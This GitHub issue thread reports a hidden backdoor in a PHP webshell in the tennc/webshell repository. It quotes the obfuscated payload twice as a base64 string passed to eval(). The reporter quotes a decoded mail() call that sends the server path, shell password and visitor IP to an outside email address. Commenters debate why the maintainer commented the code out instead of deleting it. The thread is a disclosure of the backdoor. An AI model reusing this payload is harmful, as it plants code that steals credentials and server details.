### ISSUE TITLE
Hidden Backdoor

### ISSUE THREAD

**Issue by dev0root** [tennc/webshell#27]
in Line 75 you can see this code
`$wsobuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjYgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgib2t5YXp1QGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw==";  
eval(base64_decode($wsobuff)); ` when i decode it i see mail() function to send (path ,password ,visitor ip) to this email okyazu@gmail.com `@mail("okyazu@gmail.com",$judul,$body,$auth_pass);`

**Comment by tennc** [comment]
what the webshell ？？ url or name   ,i del it

**Comment by aancw** [comment]
Same with this issue 

https://github.com/tennc/webshell/issues/20

**Comment by aancw** [comment]
Found. 

https://github.com/tennc/webshell/blob/e872dddc4116ebc06ea8c9fd604eb2bb8e2e4c19/php/404.php.txt

**Comment by port9org** [comment]
👍

**Comment by aancw** [comment]
@tennc yep, look at line 75-76. 

```
$wsobuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjYgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgib2t5YXp1QGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw==";  
eval(base64_decode($wsobuff)); 
```

**Comment by tennc** [comment]
@aancw thank you， i use 
``` /*   */
```
commented out codes

**Comment by aancw** [comment]
Why don't you just delete that code?

**Comment by tennc** [comment]
@aancw  easy to query later for everybody

**Comment by aancw** [comment]
Ah i see, i think you can close this issue.

**Comment by tennc** [comment]
yes    :） :+1:

**Comment by stevesbrain** [comment]
@aancw More than likely so it can be easily uncommented again at a later date without as much scrutiny - whereas if it had been deleted, re-adding such a large code-block later would raise some flags and cause people to look at the code more closely.

The excuse of "easy to query later for everybody" doesn't make sense, as git keeps history, so anyone could easily query the git commit prior to the removal if they want to see the code.

**Comment by steinhaug** [comment]
Infact  a  pretty  big  deal  I would say, just toticed the thread was
closed  so  I  had  to  look  into closed threads and there I see most
threads are regarding hidden back doors.

Are  theese  webshells  collected or maintained, seems only logical to
assume they all have backdoors except those already detected.

That  being  said,  not  everyone  has time and effort to keep up with
maintenance   of  their  repos  though  but  agreed  on  the  removal,
definatelty important to do and commit unless the repository owner has
an advantage of the back doors being there?

If your dealing with back door webshells I guess you must expect being
attempted  backdoored  all  over the place - these scripts are in most
cases  very  dangerous  to even play with if not having extremely good
oversight!

Mvh,
Kim Steinhaug
mailto:kim@steinhaug.com

----- Opprinnelig melding fra tirsdag 11. september 2018 -----
